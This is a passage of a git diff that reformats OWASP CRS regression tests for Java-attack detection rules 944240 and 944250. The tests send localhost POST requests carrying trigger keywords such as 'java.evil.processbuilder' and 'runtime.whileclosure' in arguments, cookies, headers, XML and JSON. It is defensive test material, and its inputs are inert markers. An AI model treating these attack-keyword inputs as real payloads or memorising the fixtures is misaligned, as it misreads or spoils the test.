CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=runtime.whileclosure" + output: + log_contains: "id 
\"944240\"" + - test_title: 944240-79 + desc: "Argument name includes keyword runtime.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "runtime.whileclosure=test" + output: + log_contains: "id \"944240\"" + - test_title: 944240-80 + desc: "Cookie test includes keyword runtime.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=runtime.whileclosure + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-81 + desc: "Cookie name includes keyword runtime.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: runtime.whileclosure=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-82 + desc: "Request header test includes keyword runtime.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + 
Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: runtime.whileclosure + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-83 + desc: "XML attribute value includes keyword runtime.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-84 + desc: "XML element value includes keyword runtime.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "runtime.whileclosure" + output: + log_contains: "id \"944240\"" + - test_title: 944240-85 + desc: "Nested XML element value includes keyword runtime.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "runtime.whileclosure" + output: + 
log_contains: "id \"944240\"" + - test_title: 944240-86 + desc: "Content-Type text/plain includes keyword runtime.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=runtime.whileclosure" + output: + log_contains: "id \"944240\"" + - test_title: 944240-87 + desc: "Content-Type application/json arg value includes keyword runtime.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"runtime.whileclosure\"}" + output: + log_contains: "id \"944240\"" + - test_title: 944240-88 + desc: "Content-Type application/json arg name includes keyword runtime.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"runtime.whileclosure\": \"test\"}" + output: + log_contains: "id \"944240\"" diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944250.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944250.yaml index a4de979039..abca823e9d 100644 
--- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944250.yaml +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944250.yaml 
@@ -1,517 +1,431 @@ --- - meta: - author: "spartantri" - enabled: true - name: "944250.yaml" - description: "Positive tests for rule 944250" - tests: - - - test_title: 944250-0 - desc: "Argument test includes keyword java.evil.runtime" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=java.evil.runtime" - output: - log_contains: "id \"944250\"" - - - - test_title: 944250-1 - desc: "Argument name includes keyword java.evil.runtime" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "java.evil.runtime=test" - output: - log_contains: "id \"944250\"" - - - - test_title: 944250-2 - desc: "Cookie test includes keyword java.evil.runtime" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.evil.runtime - method: "POST" - version: "HTTP/1.0" - data: 
"test=value" - output: - log_contains: "id \"944250\"" - - - - test_title: 944250-3 - desc: "Cookie name includes keyword java.evil.runtime" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.evil.runtime=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944250\"" - - - - test_title: 944250-4 - desc: "Request header test includes keyword java.evil.runtime" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.evil.runtime - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944250\"" - - - - test_title: 944250-5 - desc: "XML attribute value includes keyword java.evil.runtime" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944250\"" - - - - test_title: 944250-6 - desc: "XML 
element value includes keyword java.evil.runtime" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.evil.runtime" - output: - log_contains: "id \"944250\"" - - - - test_title: 944250-7 - desc: "Nested XML element value includes keyword java.evil.runtime" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.evil.runtime" - output: - log_contains: "id \"944250\"" - - - - test_title: 944250-8 - desc: "Content-Type text/plain includes keyword java.evil.runtime" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=java.evil.runtime" - output: - log_contains: "id \"944250\"" - - - - test_title: 944250-9 - desc: "Content-Type application/json arg value includes keyword java.evil.runtime" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: 
"localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"java.evil.runtime\"}" - output: - log_contains: "id \"944250\"" - - - - test_title: 944250-10 - desc: "Content-Type application/json arg name includes keyword java.evil.runtime" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"java.evil.runtime\": \"test\"}" - output: - log_contains: "id \"944250\"" - - - test_title: 944250-11 - desc: "Argument test includes keyword java.evil.processbuilder" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=java.evil.processbuilder" - output: - log_contains: "id \"944250\"" - - - - test_title: 944250-12 - desc: "Argument name includes keyword java.evil.processbuilder" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "java.evil.processbuilder=test" - output: - log_contains: "id \"944250\"" - - - - test_title: 944250-13 - desc: "Cookie test includes keyword java.evil.processbuilder" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.evil.processbuilder - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944250\"" - - - - test_title: 944250-14 - desc: "Cookie name includes keyword java.evil.processbuilder" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.evil.processbuilder=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944250\"" - - - - test_title: 944250-15 - desc: "Request header test includes keyword java.evil.processbuilder" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.evil.processbuilder - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944250\"" - - - - test_title: 944250-16 - desc: "XML attribute value includes keyword java.evil.processbuilder" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944250\"" - - - - test_title: 944250-17 - desc: "XML element value includes keyword java.evil.processbuilder" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.evil.processbuilder" - output: - log_contains: "id \"944250\"" - - - - test_title: 944250-18 - desc: "Nested XML element value includes keyword java.evil.processbuilder" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.evil.processbuilder" - output: - log_contains: "id \"944250\"" - - - - test_title: 944250-19 - desc: "Content-Type text/plain includes keyword java.evil.processbuilder" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=java.evil.processbuilder" - output: - log_contains: "id \"944250\"" - - - - test_title: 944250-20 - desc: "Content-Type application/json arg value includes keyword java.evil.processbuilder" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"java.evil.processbuilder\"}" - output: - log_contains: "id \"944250\"" - - - - test_title: 944250-21 - desc: "Content-Type application/json arg name includes keyword java.evil.processbuilder" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"java.evil.processbuilder\": \"test\"}" - output: - log_contains: "id \"944250\"" +meta: + author: "spartantri" + enabled: true + name: "944250.yaml" + description: "Positive tests for rule 944250" +tests: + - test_title: 944250-1 + desc: "Argument test includes keyword java.evil.runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.evil.runtime" + output: + log_contains: "id \"944250\"" + - test_title: 944250-2 + desc: "Argument name includes keyword java.evil.runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.evil.runtime=test" + output: + log_contains: "id \"944250\"" + - test_title: 944250-3 + desc: "Cookie test includes keyword java.evil.runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: 
"gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.evil.runtime + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944250\"" + - test_title: 944250-4 + desc: "Cookie name includes keyword java.evil.runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.evil.runtime=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944250\"" + - test_title: 944250-5 + desc: "Request header test includes keyword java.evil.runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.evil.runtime + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944250\"" + - test_title: 944250-6 + desc: "XML attribute value includes keyword java.evil.runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944250\"" + - test_title: 944250-7 + desc: "XML element 
value includes keyword java.evil.runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.evil.runtime" + output: + log_contains: "id \"944250\"" + - test_title: 944250-8 + desc: "Nested XML element value includes keyword java.evil.runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.evil.runtime" + output: + log_contains: "id \"944250\"" + - test_title: 944250-9 + desc: "Content-Type text/plain includes keyword java.evil.runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.evil.runtime" + output: + log_contains: "id \"944250\"" + - test_title: 944250-10 + desc: "Content-Type application/json arg value includes keyword java.evil.runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" 
+ Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.evil.runtime\"}" + output: + log_contains: "id \"944250\"" + - test_title: 944250-11 + desc: "Content-Type application/json arg name includes keyword java.evil.runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.evil.runtime\": \"test\"}" + output: + log_contains: "id \"944250\"" + - test_title: 944250-12 + desc: "Argument test includes keyword java.evil.processbuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.evil.processbuilder" + output: + log_contains: "id \"944250\"" + - test_title: 944250-13 + desc: "Argument name includes keyword java.evil.processbuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.evil.processbuilder=test" + output: + log_contains: "id \"944250\"" + - test_title: 944250-14 + desc: "Cookie test includes 
keyword java.evil.processbuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.evil.processbuilder + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944250\"" + - test_title: 944250-15 + desc: "Cookie name includes keyword java.evil.processbuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.evil.processbuilder=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944250\"" + - test_title: 944250-16 + desc: "Request header test includes keyword java.evil.processbuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.evil.processbuilder + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944250\"" + - test_title: 944250-17 + desc: "XML attribute value includes keyword java.evil.processbuilder" + stages: + - stage: + input: + dest_addr: 